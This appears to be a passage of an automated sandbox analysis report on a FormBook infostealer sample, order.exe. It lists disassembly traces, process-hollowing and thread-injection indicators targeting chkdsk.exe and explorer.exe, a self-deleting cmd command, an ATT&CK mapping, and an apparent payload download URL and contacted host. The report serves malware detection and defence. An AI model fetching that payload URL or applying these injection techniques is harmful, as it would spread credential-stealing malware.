      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_0518FF10 mov eax, dword ptr fs:[00000030h]19_2_0518FF10
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051C070D mov eax, dword ptr fs:[00000030h]19_2_051C070D
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051C070D mov eax, dword ptr fs:[00000030h]19_2_051C070D
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_0512A70E mov eax, dword ptr fs:[00000030h]19_2_0512A70E
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_0512A70E mov eax, dword ptr fs:[00000030h]19_2_0512A70E
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_050F4F2E mov eax, dword ptr fs:[00000030h]19_2_050F4F2E
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_050F4F2E mov eax, dword ptr fs:[00000030h]19_2_050F4F2E
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_0512E730 mov eax, dword ptr fs:[00000030h]19_2_0512E730
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_0511B73D mov eax, dword ptr fs:[00000030h]19_2_0511B73D
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_0511B73D mov eax, dword ptr fs:[00000030h]19_2_0511B73D
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_0510EF40 mov eax, dword ptr fs:[00000030h]19_2_0510EF40
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_0510FF60 mov eax, dword ptr fs:[00000030h]19_2_0510FF60
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051C8F6A mov eax, dword ptr fs:[00000030h]19_2_051C8F6A
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05177794 mov eax, dword ptr fs:[00000030h]19_2_05177794
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05177794 mov eax, dword ptr fs:[00000030h]19_2_05177794
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05177794 mov eax, dword ptr fs:[00000030h]19_2_05177794
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05108794 mov eax, dword ptr fs:[00000030h]19_2_05108794
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051337F5 mov eax, dword ptr fs:[00000030h]19_2_051337F5
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_0512A61C mov eax, dword ptr fs:[00000030h]19_2_0512A61C
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_0512A61C mov eax, dword ptr fs:[00000030h]19_2_0512A61C
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_050FC600 mov eax, dword ptr fs:[00000030h]19_2_050FC600
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_050FC600 mov eax, dword ptr fs:[00000030h]19_2_050FC600
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_050FC600 mov eax, dword ptr fs:[00000030h]19_2_050FC600
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05128E00 mov eax, dword ptr fs:[00000030h]19_2_05128E00
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051B1608 mov eax, dword ptr fs:[00000030h]19_2_051B1608
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051AFE3F mov eax, dword ptr fs:[00000030h]19_2_051AFE3F
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_050FE620 mov eax, dword ptr fs:[00000030h]19_2_050FE620
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05107E41 mov eax, dword ptr fs:[00000030h]19_2_05107E41
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05107E41 mov eax, dword ptr fs:[00000030h]19_2_05107E41
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05107E41 mov eax, dword ptr fs:[00000030h]19_2_05107E41
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05107E41 mov eax, dword ptr fs:[00000030h]19_2_05107E41
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05107E41 mov eax, dword ptr fs:[00000030h]19_2_05107E41
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05107E41 mov eax, dword ptr fs:[00000030h]19_2_05107E41
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051BAE44 mov eax, dword ptr fs:[00000030h]19_2_051BAE44
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051BAE44 mov eax, dword ptr fs:[00000030h]19_2_051BAE44
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_0511AE73 mov eax, dword ptr fs:[00000030h]19_2_0511AE73
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_0511AE73 mov eax, dword ptr fs:[00000030h]19_2_0511AE73
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_0511AE73 mov eax, dword ptr fs:[00000030h]19_2_0511AE73
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_0511AE73 mov eax, dword ptr fs:[00000030h]19_2_0511AE73
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_0511AE73 mov eax, dword ptr fs:[00000030h]19_2_0511AE73
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_0510766D mov eax, dword ptr fs:[00000030h]19_2_0510766D
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_0518FE87 mov eax, dword ptr fs:[00000030h]19_2_0518FE87
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051746A7 mov eax, dword ptr fs:[00000030h]19_2_051746A7
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051C0EA5 mov eax, dword ptr fs:[00000030h]19_2_051C0EA5
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051C0EA5 mov eax, dword ptr fs:[00000030h]19_2_051C0EA5
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051C0EA5 mov eax, dword ptr fs:[00000030h]19_2_051C0EA5
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051C8ED6 mov eax, dword ptr fs:[00000030h]19_2_051C8ED6
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05138EC7 mov eax, dword ptr fs:[00000030h]19_2_05138EC7
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051AFEC0 mov eax, dword ptr fs:[00000030h]19_2_051AFEC0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051236CC mov eax, dword ptr fs:[00000030h]19_2_051236CC
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051216E0 mov ecx, dword ptr fs:[00000030h]19_2_051216E0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051076E2 mov eax, dword ptr fs:[00000030h]19_2_051076E2
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_050F9100 mov eax, dword ptr fs:[00000030h]19_2_050F9100
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_050F9100 mov eax, dword ptr fs:[00000030h]19_2_050F9100
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_050F9100 mov eax, dword ptr fs:[00000030h]19_2_050F9100
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_0512513A mov eax, dword ptr fs:[00000030h]19_2_0512513A
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_0512513A mov eax, dword ptr fs:[00000030h]19_2_0512513A
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05114120 mov eax, dword ptr fs:[00000030h]19_2_05114120
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05114120 mov eax, dword ptr fs:[00000030h]19_2_05114120
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05114120 mov eax, dword ptr fs:[00000030h]19_2_05114120
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05114120 mov eax, dword ptr fs:[00000030h]19_2_05114120
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05114120 mov ecx, dword ptr fs:[00000030h]19_2_05114120
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_0511B944 mov eax, dword ptr fs:[00000030h]19_2_0511B944
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_0511B944 mov eax, dword ptr fs:[00000030h]19_2_0511B944
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_050FC962 mov eax, dword ptr fs:[00000030h]19_2_050FC962
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_050FB171 mov eax, dword ptr fs:[00000030h]19_2_050FB171
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_050FB171 mov eax, dword ptr fs:[00000030h]19_2_050FB171
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05122990 mov eax, dword ptr fs:[00000030h]19_2_05122990
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_0511C182 mov eax, dword ptr fs:[00000030h]19_2_0511C182
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_0512A185 mov eax, dword ptr fs:[00000030h]19_2_0512A185
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051751BE mov eax, dword ptr fs:[00000030h]19_2_051751BE
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051751BE mov eax, dword ptr fs:[00000030h]19_2_051751BE
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051751BE mov eax, dword ptr fs:[00000030h]19_2_051751BE
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051751BE mov eax, dword ptr fs:[00000030h]19_2_051751BE
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051199BF mov ecx, dword ptr fs:[00000030h]19_2_051199BF
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051199BF mov ecx, dword ptr fs:[00000030h]19_2_051199BF
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051199BF mov eax, dword ptr fs:[00000030h]19_2_051199BF
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051199BF mov ecx, dword ptr fs:[00000030h]19_2_051199BF
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051199BF mov ecx, dword ptr fs:[00000030h]19_2_051199BF
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051199BF mov eax, dword ptr fs:[00000030h]19_2_051199BF
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051199BF mov ecx, dword ptr fs:[00000030h]19_2_051199BF
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051199BF mov ecx, dword ptr fs:[00000030h]19_2_051199BF
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051199BF mov eax, dword ptr fs:[00000030h]19_2_051199BF
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051199BF mov ecx, dword ptr fs:[00000030h]19_2_051199BF
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051199BF mov ecx, dword ptr fs:[00000030h]19_2_051199BF
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051199BF mov eax, dword ptr fs:[00000030h]19_2_051199BF
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051769A6 mov eax, dword ptr fs:[00000030h]19_2_051769A6
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051261A0 mov eax, dword ptr fs:[00000030h]19_2_051261A0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051261A0 mov eax, dword ptr fs:[00000030h]19_2_051261A0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051B49A4 mov eax, dword ptr fs:[00000030h]19_2_051B49A4
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051B49A4 mov eax, dword ptr fs:[00000030h]19_2_051B49A4
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051B49A4 mov eax, dword ptr fs:[00000030h]19_2_051B49A4
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051B49A4 mov eax, dword ptr fs:[00000030h]19_2_051B49A4
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_050FB1E1 mov eax, dword ptr fs:[00000030h]19_2_050FB1E1
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_050FB1E1 mov eax, dword ptr fs:[00000030h]19_2_050FB1E1
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_050FB1E1 mov eax, dword ptr fs:[00000030h]19_2_050FB1E1
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051841E8 mov eax, dword ptr fs:[00000030h]19_2_051841E8
      Source: C:\Users\user\Desktop\order.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\chkdsk.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_0056330B RtlAddVectoredExceptionHandler,NtProtectVirtualMemory,LdrInitializeThunk,NtProtectVirtualMemory,12_2_0056330B

      HIPS / PFW / Operating System Protection Evasion:

      barindex
      Maps a DLL or memory area into another processShow sources
      Source: C:\Users\user\Desktop\order.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\user\Desktop\order.exeSection loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\user\Desktop\order.exeSection loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Modifies the context of a thread in another process (thread injection)Show sources
      Source: C:\Users\user\Desktop\order.exeThread register set: target process: 3292Jump to behavior
      Source: C:\Windows\SysWOW64\chkdsk.exeThread register set: target process: 3292Jump to behavior
      Queues an APC in another process (thread injection)Show sources
      Source: C:\Users\user\Desktop\order.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
      Sample uses process hollowing techniqueShow sources
      Source: C:\Users\user\Desktop\order.exeSection unmapped: C:\Windows\SysWOW64\chkdsk.exe base address: A20000Jump to behavior
      Source: C:\Users\user\Desktop\order.exeProcess created: C:\Users\user\Desktop\order.exe 'C:\Users\user\Desktop\order.exe' Jump to behavior
      Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\order.exe'Jump to behavior
      Source: explorer.exe, 00000010.00000000.376512460.0000000001400000.00000002.00000001.sdmp, chkdsk.exe, 00000013.00000002.508725687.0000000006560000.00000002.00000001.sdmpBinary or memory string: uProgram Manager
      Source: explorer.exe, 00000010.00000000.376512460.0000000001400000.00000002.00000001.sdmp, chkdsk.exe, 00000013.00000002.508725687.0000000006560000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000010.00000000.376512460.0000000001400000.00000002.00000001.sdmp, chkdsk.exe, 00000013.00000002.508725687.0000000006560000.00000002.00000001.sdmpBinary or memory string: Progman
      Source: explorer.exe, 00000010.00000000.376117915.0000000000EB8000.00000004.00000020.sdmpBinary or memory string: ProgmanX
      Source: explorer.exe, 00000010.00000000.376512460.0000000001400000.00000002.00000001.sdmp, chkdsk.exe, 00000013.00000002.508725687.0000000006560000.00000002.00000001.sdmpBinary or memory string: Progmanlock
      Source: explorer.exe, 00000010.00000000.399496745.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWndAj

      Stealing of Sensitive Information:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000013.00000002.506645902.0000000004EC0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000013.00000002.505278996.00000000007A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000013.00000002.506547005.0000000004E90000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000C.00000002.421125890.000000001E150000.00000040.00000001.sdmp, type: MEMORY
      Yara detected Generic DropperShow sources
      Source: Yara matchFile source: Process Memory Space: order.exe PID: 6008, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: chkdsk.exe PID: 4888, type: MEMORY

      Remote Access Functionality:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000013.00000002.506645902.0000000004EC0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000013.00000002.505278996.00000000007A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000013.00000002.506547005.0000000004E90000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000C.00000002.421125890.000000001E150000.00000040.00000001.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsShared Modules1Path InterceptionProcess Injection412Rootkit1Credential API Hooking1Security Software Discovery621Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion22Input Capture1Virtualization/Sandbox Evasion22Remote Desktop ProtocolInput Capture1Exfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection412Security Account ManagerProcess Discovery2SMB/Windows Admin SharesArchive Collected Data1Automated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information2LSA SecretsSystem Information Discovery21SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      order.exe22%VirustotalBrowse
      order.exe42%ReversingLabsWin32.Trojan.Vebzenpak

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
      http://www.tiro.com0%URL Reputationsafe
      http://www.tiro.com0%URL Reputationsafe
      http://www.tiro.com0%URL Reputationsafe
      http://www.tiro.com0%URL Reputationsafe
      http://www.goodfont.co.kr0%URL Reputationsafe
      http://www.goodfont.co.kr0%URL Reputationsafe
      http://www.goodfont.co.kr0%URL Reputationsafe
      http://www.goodfont.co.kr0%URL Reputationsafe
      http://www.carterandcone.coml0%URL Reputationsafe
      http://www.carterandcone.coml0%URL Reputationsafe
      http://www.carterandcone.coml0%URL Reputationsafe
      http://www.carterandcone.coml0%URL Reputationsafe
      http://www.sajatypeworks.com0%URL Reputationsafe
      http://www.sajatypeworks.com0%URL Reputationsafe
      http://www.sajatypeworks.com0%URL Reputationsafe
      http://www.sajatypeworks.com0%URL Reputationsafe
      http://www.typography.netD0%URL Reputationsafe
      http://www.typography.netD0%URL Reputationsafe
      http://www.typography.netD0%URL Reputationsafe
      http://www.typography.netD0%URL Reputationsafe
      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
      http://fontfabrik.com0%URL Reputationsafe
      http://fontfabrik.com0%URL Reputationsafe
      http://fontfabrik.com0%URL Reputationsafe
      http://fontfabrik.com0%URL Reputationsafe
      http://www.founder.com.cn/cn0%URL Reputationsafe
      http://www.founder.com.cn/cn0%URL Reputationsafe
      http://www.founder.com.cn/cn0%URL Reputationsafe
      http://www.founder.com.cn/cn0%URL Reputationsafe
      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
      http://www.sandoll.co.kr0%URL Reputationsafe
      http://www.sandoll.co.kr0%URL Reputationsafe
      http://www.sandoll.co.kr0%URL Reputationsafe
      http://www.sandoll.co.kr0%URL Reputationsafe
      http://www.urwpp.deDPlease0%URL Reputationsafe
      http://www.urwpp.deDPlease0%URL Reputationsafe
      http://www.urwpp.deDPlease0%URL Reputationsafe
      http://www.urwpp.deDPlease0%URL Reputationsafe
      http://www.zhongyicts.com.cn0%URL Reputationsafe
      http://www.zhongyicts.com.cn0%URL Reputationsafe
      http://www.zhongyicts.com.cn0%URL Reputationsafe
      http://www.zhongyicts.com.cn0%URL Reputationsafe
      http://www.sakkal.com0%URL Reputationsafe
      http://www.sakkal.com0%URL Reputationsafe
      http://www.sakkal.com0%URL Reputationsafe
      http://www.sakkal.com0%URL Reputationsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      pilatescollective.com
      		192.185.152.65
      		truefalse
        		high

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000010.00000002.520398234.0000000006870000.00000004.00000001.sdmpfalse
          		high
          http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000010.00000000.402378328.000000000BE76000.00000002.00000001.sdmpfalse
            		high
            http://www.fontbureau.comexplorer.exe, 00000010.00000000.402378328.000000000BE76000.00000002.00000001.sdmpfalse
              		high
              http://www.fontbureau.com/designersGexplorer.exe, 00000010.00000000.402378328.000000000BE76000.00000002.00000001.sdmpfalse
                		high
                http://www.fontbureau.com/designers/?explorer.exe, 00000010.00000000.402378328.000000000BE76000.00000002.00000001.sdmpfalse
                  		high
                  http://www.founder.com.cn/cn/bTheexplorer.exe, 00000010.00000000.402378328.000000000BE76000.00000002.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  https://pilatescollective.com/meantunde/komyydor_NMWgNRCNBM31.binorder.exe, 0000000C.00000002.415980723.0000000000560000.00000040.00000001.sdmpfalse
                    		high
                    http://www.fontbureau.com/designers?explorer.exe, 00000010.00000000.402378328.000000000BE76000.00000002.00000001.sdmpfalse
                      		high
                      http://www.tiro.comexplorer.exe, 00000010.00000000.402378328.000000000BE76000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://www.fontbureau.com/designersexplorer.exe, 00000010.00000000.402378328.000000000BE76000.00000002.00000001.sdmpfalse
                        		high
                        http://www.goodfont.co.krexplorer.exe, 00000010.00000000.402378328.000000000BE76000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.carterandcone.comlexplorer.exe, 00000010.00000000.402378328.000000000BE76000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.sajatypeworks.comexplorer.exe, 00000010.00000000.402378328.000000000BE76000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.typography.netDexplorer.exe, 00000010.00000000.402378328.000000000BE76000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000010.00000000.402378328.000000000BE76000.00000002.00000001.sdmpfalse
                          		high
                          http://www.founder.com.cn/cn/cTheexplorer.exe, 00000010.00000000.402378328.000000000BE76000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000010.00000000.402378328.000000000BE76000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://fontfabrik.comexplorer.exe, 00000010.00000000.402378328.000000000BE76000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.founder.com.cn/cnexplorer.exe, 00000010.00000000.402378328.000000000BE76000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000010.00000000.402378328.000000000BE76000.00000002.00000001.sdmpfalse
                            		high
                            http://www.jiyu-kobo.co.jp/explorer.exe, 00000010.00000000.402378328.000000000BE76000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000010.00000000.402378328.000000000BE76000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designers8explorer.exe, 00000010.00000000.402378328.000000000BE76000.00000002.00000001.sdmpfalse
                              		high
                              http://www.fonts.comexplorer.exe, 00000010.00000000.402378328.000000000BE76000.00000002.00000001.sdmpfalse
                                		high
                                http://www.sandoll.co.krexplorer.exe, 00000010.00000000.402378328.000000000BE76000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.urwpp.deDPleaseexplorer.exe, 00000010.00000000.402378328.000000000BE76000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.zhongyicts.com.cnexplorer.exe, 00000010.00000000.402378328.000000000BE76000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.sakkal.comexplorer.exe, 00000010.00000000.402378328.000000000BE76000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown

                                Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public

                                IPDomainCountryFlagASNASN NameMalicious
                                192.185.152.65
                                		unknownUnited States
                                		46606UNIFIEDLAYER-AS-1USfalse

                                General Information

                                Joe Sandbox Version:31.0.0 Red Diamond
                                Analysis ID:320634
                                Start date:19.11.2020
                                Start time:16:08:34
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 9m 14s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Sample file name:order.exe
                                Cookbook file name:default.jbs
